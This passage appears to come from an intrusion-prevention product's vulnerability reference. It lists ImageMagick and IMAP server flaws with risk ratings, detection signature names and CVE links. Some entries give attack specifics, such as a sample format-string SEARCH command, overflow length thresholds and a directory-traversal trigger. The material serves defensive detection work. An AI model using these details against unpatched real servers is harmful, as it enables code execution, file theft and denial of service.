Description: Improper validation of MVG files results in a file deletion vulnerability. A successful exploit allows an attacker to delete arbitrary files on the host system.
Situation: File-Text_Imagemagick-Ephemeral-Protocol-Arbitrary-File-Deletion
References:
CVE-2016-3715
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3715
Back to top

Imagemagick-EXIF-Resolutionunit-Handling-Memory-Corruption

About this vulnerability: A vulnerability in ImageMagick
Risk: Moderate
First detected in: sgpkg-ips-445-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Imagemagick
Type: Malfunction
Description: ImageMagick is a software suite to used create, edit, and compose bitmap images. It can read, convert, and write images in a variety of formats. It is commonly used in CGI scripts and through PHP interfaces for image manipulation on web servers. A memory access error vulnerability has been reported in ImageMagick. The vulnerability is due to a boundary error in the ImageMagick library specifically while handling crafted ResolutionUnit tags in EXIF headers. Remote attackers could exploit this vulnerability by uploading a malicious image file to a vulnerable server or by persuading a target user to open such an image file in a desktop program that uses the vulnerable version of ImageMagick. Successful exploitation would cause memory corruption, which may lead to arbitrary code execution in the security context of the affected server application or the logged-in user.
Situation: HTTP_CS-Imagemagick-EXIF-Resolutionunit-Handling-Memory-Corruption
File-JPEG_Imagemagick-EXIF-Resolutionunit-Handling-Memory-Corruption
References:
CVE-2012-0247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0247
BID-51957
http://www.securityfocus.com/bid/51957
OSVDB-79003
http://www.osvdb.org/79003
Back to top

Imagemagick-File-Deletion-Vulnerability

About this vulnerability: A vulnerability in ImageMagick
Risk: High
First detected in: sgpkg-ips-763-5211
Last changed: sgpkg-ips-1732-5242
Platform: Generic
Software: Imagemagick
Type: Malfunction
Description: A vulnerability in ImageMagick allows a remote attacker to delete files via a crafted image.
Situation: File-Text_Imagemagick-Ephemeral-Protocol-Arbitrary-File-Deletion
References:
CVE-2016-3715
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3715
Back to top

Imagemagick-File-Moving-Vulnerability

About this vulnerability: A vulnerability in ImageMagick
Risk: High
First detected in: sgpkg-ips-763-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Imagemagick
Type: Malfunction
Description: A vulnerability in ImageMagick allows a remote attacker to move image files into files with any extension via a crafted image.
Situation: File-Text_Imagemagick-File-Moving-Vulnerability
References:
CVE-2016-3716
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3716
Back to top

Imagemagick-GIF-Comment-Processing-Off-By-One-Buffer-Overflow

About this vulnerability: An ImageMagick GIF Comment Processing Off-by-one Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Imagemagick
Type: Buffer Overflow
Description: A buffer overflow vulnerability in ImageMagick which allows remote attackers to cause a denial of service condition or execute arbitrary code by uploading a maliciously crafted GIF image to a vulnerable web server, due to insufficient validation of certain fields within a GIF image.
Situation: File-GIF_Imagemagick-GIF-Comment-Processing-Off-By-One-Buffer-Overflow
References:
CVE-2013-4298
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4298
Back to top

Imagemagick-HTTP_Request_Vulnerability

About this vulnerability: A vulnerability in ImageMagick
Risk: High
First detected in: sgpkg-ips-763-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Imagemagick
Type: Malfunction
Description: A vulnerability in ImageMagick allows a remote attacker to conduct server-side request forgery attacks via a crafted image.
Situation: File-Text_Imagemagick-HTTP-Request-Vulnerability
References:
CVE-2016-3718
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3718
Back to top

Imagemagick-Local-File-Read-Vulnerability

About this vulnerability: A vulnerability in ImageMagick
Risk: High
First detected in: sgpkg-ips-763-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Imagemagick
Type: Malfunction
Description: A vulnerability in ImageMagick allows a remote attacker to read contents of the files on a server via a crafted image.
Situation: File-Text_Imagemagick-Local-File-Read-Vulnerability
References:
CVE-2016-3717
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3717
Back to top

Imagemagick-PDF-And-PostScript-Image-Ghostscript-Command-Injection

About this vulnerability: A vulnerability in ImageMagick.
Risk: High
First detected in: sgpkg-ips-1435-5242
Last changed: sgpkg-ips-1435-5242
Platform: Generic
Software: Imagemagick
Type: Input Validation
Description: A vulnerability in ImageMagick Studio ImageMagick, 7.1.0-23 and before, which allows remote attackers to execute arbitrary commands on a target system by enticing a victum to perform a command on a malicious file, due to insufficient input validation when passing commands for Ghostscript to execute.
Situation: File-TextId_Imagemagick-PDF-And-PostScript-Image-Ghostscript-Command-Injection
References:
CVE-2021-3781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3781
Back to top

Imagemagick-PNG-Text-Profile-Arbitrary-File-Read

About this vulnerability: A vulnerability in ImageMagick
Risk: Moderate
First detected in: sgpkg-ips-1560-5242
Last changed: sgpkg-ips-1560-5242
Platform: Generic
Software: Imagemagick
Type: Input Validation
Description: An arbitrary file read vulnerability has been reported for ImageMagick. This vulnerability is due to improper input validation of textual chunk types containing the "profile" keyword when parsing PNG files. A remote attacker could exploit this vulnerability by enticing the victim to use a crafted file. Successfully exploiting this vulnerability could result in disclosure of file contents.
Situation: File-PNG_Imagemagick-PNG-Text-Profile-Arbitrary-File-Read
References:
CVE-2022-44268
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44268
Back to top

Imagemagick-PNG-Text-Profile-Denial-Of-Service

About this vulnerability: A vulnerability in ImageMagick
Risk: High
First detected in: sgpkg-ips-1561-5242
Last changed: sgpkg-ips-1561-5242
Platform: Generic
Software: Imagemagick
Type: Input Validation
Description: A denial of service vulnerability has been reported for ImageMagick. This vulnerability is due to improper input validation of textual chunk types containing the "profile" keyword when parsing PNG files. A remote attacker could exploit this vulnerability by enticing the victim to use a crafted file. Successfully exploiting this vulnerability could result in denial of service.
Situation: File-PNG_Imagemagick-PNG-Text-Profile-Denial-Of-Service
References:
CVE-2022-44267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44267
Back to top

Imagemagick-Popen-Shell-Character-Filtering-Code-Execution

About this vulnerability: A vulnerability in ImageMagick
Risk: High
First detected in: sgpkg-ips-775-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Imagemagick
Type: Malfunction
Description: ImageMagick popen() function has insufficient filtering for shell characters. A remote attacker can use this to execute code on the affected system.
Situation: File-TextId_Imagemagick-Shell-Character-Filtering-Code-Execution
File-Text_Imagemagick-Shell-Character-Filtering-Code-Execution
References:
CVE-2016-5118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5118
Back to top

Imagemagick-Shell-Character-Filtering-Code-Execution

About this vulnerability: A vulnerability in ImageMagick
Risk: High
First detected in: sgpkg-ips-763-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Imagemagick
Type: Malfunction
Description: ImageMagick has insufficient filtering for shell characters. A remote attacker can use this to execute code on the affected system.
Situation: File-TextId_Imagemagick-Shell-Character-Filtering-Code-Execution
File-Text_Imagemagick-Shell-Character-Filtering-Code-Execution
References:
CVE-2016-3714
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3714
Back to top

Imagemagick-Syncexifprofile-Out-Of-Bounds-Array-Indexing

About this vulnerability: A vulnerability in ImageMagick Studio ImageMagick
Risk: Moderate
First detected in: sgpkg-ips-810-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Imagemagick
Type: Malfunction
Description: Improper handling of image EXIF data in ImageMagick causes an out-of-bounds array indexing vulnerability. A succesful exploit allows an attacker to run arbitrary code on the target system.
Situation: File-JPEG_Imagemagick-Syncexifprofile-Out-Of-Bounds-Array-Indexing
References:
CVE-2016-7799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7799
Back to top

IMAP-Atrium-Software-Mercur-IMAPD-NTLMSSP-Command-Handling-Memory-Corruption

About this vulnerability: Buffer overflow vulnerability in the Atrium MERCUR IMAP service
Risk: Critical
First detected in: sgpkg-ips-108-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Mercur Messaging
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in the Atrium MERCUR IMAP service. A crafted NTLM type 3 message allows arbitrary code execution with System level privileges.
Situation: IMAP_Atrium-Software-Mercur-IMAPD-NTLMSSP-Command-Handling-Memory-Corruption
References:
CVE-2007-1578
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1578
BID-23058
http://www.securityfocus.com/bid/23058
OSVDB-33545
http://www.osvdb.org/33545
Back to top

IMAP-Epost-Spa-Pro-Mail-Create-Buffer-Overflow

About this vulnerability: Buffer overflow in E-Post's Spa-Pro mail server
Risk: High
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: E-Post SPA-PRO Mail
Type: Buffer Overflow
Description: E-Post Spa-Pro Mail's IMAP server has a buffer overflow vulnerability in the handling of long CREATE requests. Remote attackers can execute arbitrary code on the server by sending a CREATE command with mailbox name that is over 256 bytes long.
Situation: IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Create-Command
References:
BID-13839
http://www.securityfocus.com/bid/13839
Back to top

IMAP-Gnu-Mailutils-Command-Tag-Format-String-System-Compromise

About this vulnerability: Format strings vulnerability in GNU Mailutils 0.5 and 0.6 allow system compromise
Risk: High
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GNU Mailutils
Type: Format String
Description: Gnu Mailutils 0.5 and 0.6 suffer from a format string vulnerability in the command tag handling. Each IMAP command is prefixed with a unique command tag by the client, which the server includes in its reply to the command. Gnu Mailutils does not filter the input sufficiently, allowing remote attackers to execute arbitrary code by sending a command tag that includes format string sequences.
Situation: IMAP_CS-Gnu-Mailutils-IMap4d-Format-String-Vulnerability
References:
CVE-2005-1523
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1523
BID-13764
http://www.securityfocus.com/bid/13764
Back to top

IMAP-Gnu-Mailutils-IMap4d-Search-Compromise

About this vulnerability: Format strings vulnerability in GNU Mailutils IMAP4d search function
Risk: High
First detected in: sgpkg-ips-39-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GNU Mailutils
Type: Format String
Description: GNU Mailutils IMAP4D suffers from a format string vulnerability in the search function. A command like "SEARCH TOPIC %08x.%08x.%08x.%08x" will result in an error string containing values that where actually supplied to the search function. The vulnerability allows remote attackers to write values into memory, leading to arbitrary code execution.
Situation: IMAP_Gnu-Mailutils-IMap4d-Search-Compromise
References:
CVE-2005-2878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2878
BID-14794
http://www.securityfocus.com/bid/14794
Back to top

IMAP-Ipswitch-IMail-Server-IMAP-Search-Command-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the Ipswitch IMail Server search function
Risk: Moderate
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IMail
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Ipswitch IMail Server search function. After authentication to the vulnerable IMAP server, a SEARCH command with a malicious CHARSET argument allows arbitrary code execution with the privileges of the affected service.
Situation: IMAP_Ipswitch-IMail-Server-IMAP-Search-Command-Buffer-Overflow
References:
CVE-2007-3925
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3925
BID-24962
http://www.securityfocus.com/bid/24962
OSVDB-36220
http://www.osvdb.org/36220
Back to top

IMAP-Ipswitch-IMail-Server-IMAP-Search-Command-Date-String-Stack-Overflow

About this vulnerability: Buffer overflow vulnerability in the Ipswitch IMail Server search command
Risk: High
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IMail
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in the Ipswitch IMail Server search command. After authentication to the vulnerable IMAP server, a SEARCH command with a malicious DATE string allows arbitrary code execution with the privileges of the affected service, normally System.
Situation: IMAP_Ipswitch-IMail-Server-IMAP-Search-Command-Date-String-Stack-Overflow
References:
CVE-2007-3925
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3925
BID-24962
http://www.securityfocus.com/bid/24962
OSVDB-36219
http://www.osvdb.org/36219
Back to top

IMAP-Ipswitch-IMail-Server-IMAP-Subscribe-Command-Stack-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the Ipswitch IMail Server subscribe command handling
Risk: Moderate
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IMail
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Ipswitch IMail Server subscribe command handling. After authentication to the vulnerable IMAP server, a SUBSCRIBE command with a malicious MAILBOX argument allows arbitrary code execution with the privileges of the affected service, which is normally the System account.
Situation: IMAP_Ipswitch-IMail-Server-IMAP-Subscribe-Command-Stack-Buffer-Overflow
References:
CVE-2007-2795
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2795
BID-24962
http://www.securityfocus.com/bid/24962
OSVDB-36221
http://www.osvdb.org/36221
Back to top

IMAP-Ipswitch-IMail-Server-List-Command-Denial-Of-Service

About this vulnerability: Ipswitch IMail server LIST command handling vulnerability
Risk: Moderate
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IMail; Ipswitch Collaboration Suite
Type: Buffer Overflow
Description: Ipswitch IMail Server suffers from a buffer overflow vulnerability in the handling of the IMAP LIST command. If the second argument, MailboxName, is longer than 7408 bytes a buffer overflow occurs. The overflow leads to an unhandled exception which terminates the service. The vulnerability can only be exploited by authenticated users, and does not allow attackers to execute code.
Situation: IMAP_Ipswitch-IMail-Server-List-Command-Denial-Of-Service
References:
CVE-2005-2923
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2923
BID-15753
http://www.securityfocus.com/bid/15753
Back to top

IMAP-Ipswitch-IMail-Web-Calendar-File-Disclosure

About this vulnerability: File disclosure vulnerability in Ipswitch IMail web calendar server.
Risk: Low
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT; Windows 2000; Windows XP; Windows 2003
Software: IMail
Type: Directory Traversal
Description: Ipswitch IMail Web Calendar server (HTTP server running by default on tcp port 8484) does not handle correctly requests for nonexistent .jsp files. By passing a long string of directory traversal sequences (\..) to a nonexistent .jsp, remote attackers can traverse the servers file system and view arbitrary files. No authentication is required, the vulnerability can be exploited easily with a web browser.
Situation: HTTP_CSU-Ipswitch-IMail-Web-Calendar-File-Disclosure
References:
CVE-2005-1252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1252
BID-13727
http://www.securityfocus.com/bid/13727
Back to top

IMAP-Ipswitch-IMAP-Login-Command-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Ipswitch IMAP's login command.
Risk: High
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IMail; Ipswitch Collaboration Suite
Type: Buffer Overflow
Description: Ipswitch IMail IMAP server suffers from a buffer overflow vulnerability in the handling of arguments to the LOGIN command. A long username of around 2000 bytes will cause a buffer overflow, allowing arbitrary command execution. Since the vulnerability is in the login command, no authentication is required to exploit the software. Another variant of the vulnerability exists if the login name is prefixed with a special character %, :, *, @ or &. Login names prefixed with one of these special characters also lead to a buffer overflow but the situation is easier to exploit.
Situation: IMAP_Excessively-Long-Username-Argument-In-IMAP-Login-Command
References:
CVE-2005-1255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1255
BID-13727
http://www.securityfocus.com/bid/13727
Back to top

IMAP-Ipswitch-IMAP-Lsub-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in Ipswitch ICS IMAP daemon.
Risk: Low
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Ipswitch Collaboration Suite; IMail
Type: Malfunction
Description: Ipswitch Collaboration Suites's IMAP server suffers from a denial of service vulnerability. A long string of NULL characters sent as an argument to the LSUB command causes heavy load on the server, eventually leading to resource starvation and a denial of service. The LSUB command can be used only after authentication, limiting the impact of the vulnerability.
Situation: IMAP_Ipswitch-IMAP-Lsub-Denial-Of-Service
References:
CVE-2005-1249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1249
BID-13727
http://www.securityfocus.com/bid/13727
Back to top

IMAP-Ipswitch-IMAP-Select-Command-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in Ipswitch IMAP server, SELECT command.
Risk: Low
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IMail
Type: Buffer Overflow
Description: Ipswitch IMail IMAP server does not correctly handle long arguments to the SELECT command. A long, at least 260 byte argument to the SELECT command causes a buffer overflow which crashes the IMAP server. Only authenticated users can issue the SELECT command, limiting the impact of the vulnerability.
Situation: IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Select-Command
References:
CVE-2005-1254
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1254
BID-13727
http://www.securityfocus.com/bid/13727
Back to top

IMAP-Ipswitch-IMAP-Status-Command-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Ipswitch IMAP's status command.
Risk: High
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IMail
Type: Buffer Overflow
Description: Ipswitch IMail IMAP server does not handle correctly long input to the STATUS command. By supplying a sufficiently long mailbox name to the STATUS command a buffer overflow will occur, allowing arbitrary code execution. The STATUS command can only be issued after authentication, limiting the impact of the vulnerability.
Situation: IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Status-Command
References:
CVE-2005-1256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1256
BID-13727
http://www.securityfocus.com/bid/13727
Back to top

IMAP-Ipswitch-Server-Fetch-Command-Buffer-Overflow

About this vulnerability: Ipswitch IMAP server FETCH command buffer overflow vulnerabilites
Risk: Moderate
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IMail
Type: Buffer Overflow
Description: The Ipswitch IMAP server does not parse FETCH command arguments correctly. A long value in the FETCH command's BODY or BODY.PEEK argument can overflow a buffer and lead to arbitrary code execution. Authentication is required to issue the FETCH command, limiting the scope of the vulnerability.
Situation: IMAP_Ipswitch-Server-Fetch-Command-Buffer-Overflow
References:
CVE-2005-3526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3526
BID-17063
http://www.securityfocus.com/bid/17063
OSVDB-23796
http://www.osvdb.org/23796
Back to top

IMAP-Kerio-MailServer-Large-Literal-Octet-Counter-Denial-Of-Service

About this vulnerability: Kerio MailServer large literal octet counter string vulnerability
Risk: Moderate
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Kerio MailServer
Type: Malfunction
Description: Kerio MailServer 6.1.3 and prior do not handle large literal octet counters correctly. The counters are checked for a maximum size, but if the counter value is larger than 2147483647 it is handled as negative value and always passes the test. Later the large value causes an exception and forces the server process to terminate, causing a denial of service situation.
Situation: IMAP_Large-Literal-Octet-Counter-Value
Back to top

IMAP-Login-Buffer-Overflow

About this vulnerability: Buffer overflow in multiple imap daemons.
Risk: Critical
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Netscape Messaging Server; University of Washington imapd
Type: Buffer Overflow
Description: By supplying a parameter longer than 1024 bytes to the AUTHENTICATE command, the attacker can exploit a buffer-overflow condition in certain imapd implementations, making it possible to execute arbitrary commands with administrator privileges.
Situation: IMAP_WU-IMAPD-Authenticate-BOF
References:
CVE-1999-0005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0005
BID-130
http://www.securityfocus.com/bid/130
Back to top

IMAP-MailEnable-IMAP-Command-Buffer-Overflow

About this vulnerability: MailEnable Professional buffer overflow with long IMAP commands
Risk: High
First detected in: sgpkg-ips-53-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MailEnable
Type: Buffer Overflow
Description: MailEnable Professional and Enterprise suffer from a buffer overflow vulnerability in the handling of long or invalid arguments to IMAP commands. Denial of service and arbitrary command execution are possible with a successful exploit.
Situation: IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Examine-Command
References:
CVE-2005-3993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3993
OSVDB-21388
http://www.osvdb.org/21388
Back to top

IMAP-MailEnable-IMAP-Service-Buffer-Overflow

About this vulnerability: MailEnable buffer overflow with long IMAP commands
Risk: High
First detected in: sgpkg-ips-58-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MailEnable
Type: Buffer Overflow
Description: MailEnable Professional and Enterprise suffer from a buffer overflow vulnerability with long IMAP commands. Denial of service and root/system-level compromise are possible with a successful exploit.
Situation: IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Examine-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Select-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Status-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Create-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Subscribe-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Rename-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Unsubscripe-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Delete-Command
References:
CVE-2005-3690
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3690
BID-15492
http://www.securityfocus.com/bid/15492
OSVDB-20929
http://www.osvdb.org/20929
Back to top

IMAP-MailEnable-IMAP-Service-Invalid-Command-Buffer-Overflow

About this vulnerability: MailEnable IMAP service has a stack-based buffer overflow vulnerability
Risk: High
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MailEnable
Type: Buffer Overflow
Description: MailEnable IMAP service has a stack-based buffer overflow vulnerability. A remote attacker can send one of the affected commands with an excessively long command continuation argument to cause a DoS or compromise the vulnerable server.
Situation: IMAP_MailEnable-IMAP-Service-Invalid-Command-Buffer-Overflow
References:
BID-21252
http://www.securityfocus.com/bid/21252
OSVDB-30661
http://www.osvdb.org/30661
Back to top

IMAP-MDaemon-Authenticate-Command-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the processing of authenticate command in MDaemon
Risk: Moderate
First detected in: sgpkg-ips-36-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MDaemon
Type: Buffer Overflow
Description: The IMAP service of MDaemon email server software has a buffer overflow vulnerability in the handling of authenticate command. A remote attacker can exploit this vulnerability to execute arbitrary code on the victim server.
Situation: IMAP_Authenticate-Command-Buffer-Overflow-2
IMAP_Authenticate-Command-Buffer-Overflow
References:
BID-14317
http://www.securityfocus.com/bid/14317
Back to top

IMAP-Mercur-Messaging-IMAP-Service-Buffer-Overflow

About this vulnerability: Mercur Messaging buffer overflow with long login and select commands
Risk: High
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Mercur Messaging
Type: Buffer Overflow
Description: Mercur Messaging 2005 SP3 suffers from a buffer overflow vulnerability in the handling of login and select commands. An unauthenticated attacker can exploit a vulnerability in the handling of the login command by giving an excessively long username argument, causing a DoS or arbitrary code execution. Respectively an authenticated malicious user can exploit the select command handling vulnerability causing the same outcome.
Situation: IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Select-Command
IMAP_Excessively-Long-Username-Argument-In-IMAP-Login-Command
References:
CVE-2006-1255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1255
BID-17138
http://www.securityfocus.com/bid/17138
OSVDB-23950
http://www.osvdb.org/23950
Back to top

IMAP-Microsoft-Exchange-Server-Literal-Processing-Buffer-Overflow

About this vulnerability: Buffer overflow in Microsoft Exchange Server when processing IMAP literal octets
Risk: Moderate
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Exchange Server 2000
Type: Buffer Overflow
Description: Certain versions of Microsoft Exchange Server 2000 have a buffer overflow vulnerability in the handling of the IMAP protocol. IMAP protocol messages using the IMAP command continuation method specifying a large number of octets may cause a buffer overflow and memory corruption in the server process. The vulnerability allows remote attackers to perform denial of service attacks on vulnerable Exchange servers.
Situation: IMAP_Microsoft-Exchange-Server-Literal-Processing-Buffer-Overflow
References:
CVE-2007-0221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0221
BID-23810
http://www.securityfocus.com/bid/23810
OSVDB-34392
http://www.osvdb.org/34392
MS07-026
http://technet.microsoft.com/security/bulletin/MS07-026
Back to top

IMAP-Novell-NetMail-Buffer-Overflow

About this vulnerability: Novell NetMail Buffer Overflow Vulnerability
Risk: High
First detected in: sgpkg-ips-57-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell NetMail
Type: Buffer Overflow
Description: Novell NetMail 3.5 is an e-mail and calendaring system. Novell NetMail has a stack-based buffer overflow vulnerality that can be exploited via a crafted IMAP command that contains long verb arguments. An authenticated remote attacker can cause a DoS or a root/system-level compromise.
Situation: IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Status-Command
References:
CVE-2005-3314
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3314
BID-15491
http://www.securityfocus.com/bid/15491
OSVDB-20956
http://www.osvdb.org/20956
Back to top

IMAP-Novell-NetMail-IMAP-Append-Command-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the Novell NetMail IMAP service
Risk: Moderate
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell NetMail
Type: Buffer Overflow
Description: Novell NetMail IMAP service has a stack buffer overflow vulnerability. By sending a crafted APPEND command with an excessively long date/time string, an authenticated remote attacker can cause a denial of service terminating the vulnerable service or compromise the vulnerable system.
Situation: IMAP_Novell-NetMail-IMAP-Append-Command-Buffer-Overflow
References:
CVE-2006-6425
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6425
BID-21729
http://www.securityfocus.com/bid/21729
Back to top

IMAP-Novell-NetMail-IMAP-Verb-Literal-Heap-Overflow

About this vulnerability: Novell NetMail IMAP service heap-based buffer overflow vulnerability
Risk: High
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell NetMail
Type: Buffer Overflow
Description: Novell NetMail IMAP service has a heap-based buffer overflow vulnerability. By sending one of the affected commands using the command continuation method with a negative argument length value, a remote attacker can cause a DoS or compromise the vulnerable server.
Situation: IMAP_Novell-NetMail-IMAP-Verb-Literal-Heap-Overflow
References:
CVE-2006-6424
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6424
BID-21724
http://www.securityfocus.com/bid/21724
Back to top

IMAP-Novell-NetMail-Large-Literal-Octet-Counter-Buffer-Overflow

About this vulnerability: Novell NetMail large literal octet counter buffer overflow vulnerability
Risk: High
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell NetMail
Type: Buffer Overflow
Description: Novell NetMail 3.5 does not handle large literal octet counters correctly. If the maximum integer value is supplied as a counter value, the overflowed integer is used to allocate memory. This causes a buffer oveflow in subsequent data copy operations. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim machine.
Situation: IMAP_Large-Literal-Octet-Counter-Value
References:
CVE-2005-1758
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1758
BID-14718
http://www.securityfocus.com/bid/14718
BID-13926
http://www.securityfocus.com/bid/13926
OSVDB-17239
http://www.osvdb.org/17239
Back to top

IMAP-Partial-Body-Buffer-Overflow

About this vulnerability: Buffer overflow in wu-imapd
Risk: Moderate
First detected in: sgpkg-ips-137-2032
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: University of Washington imapd
Type: Buffer Overflow
Description: An attacker with a valid user account in the remote imap service may launch a buffer-overflow attack by sending an oversized argument with BODY command. If successfully exploited, the buffer-overflow vulnerability allows arbitrary code execution in the remote server.
Situation: IMAP_WU-IMAPD-Partial-Body-Buffer-Overflow
References:
CVE-2002-0379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0379
BID-4713
http://www.securityfocus.com/bid/4713
Back to top

IMAP_MailEnable-IMAP-Service-Append-Command-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in MailEnable MailEnable Enterprise
Risk: High
First detected in: sgpkg-ips-99-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MailEnable
Type: Buffer Overflow
Description: There is a stack buffer overflow in the MailEnable IMAP Service. The vulnerability is due to a boundary error in the IMAP service when processing arguments passed to the APPEND command. Successful exploitation of this vulnerability allows a remote authenticated attacker to create a Denial of Service condition or execute arbitrary code on the vulnerable system in the context of the affected application, commonly System.
Situation: IMAP_MailEnable-IMAP-Service-Append-Command-Handling-Buffer-Overflow
References:
CVE-2007-1301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1301
BID-22792
http://www.securityfocus.com/bid/22792
Back to top

IMAP_Mercury-Mail-Transport-System-IMAP-Data-Handling-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Mercury Mail Transport System
Risk: High
First detected in: sgpkg-ips-100-1314
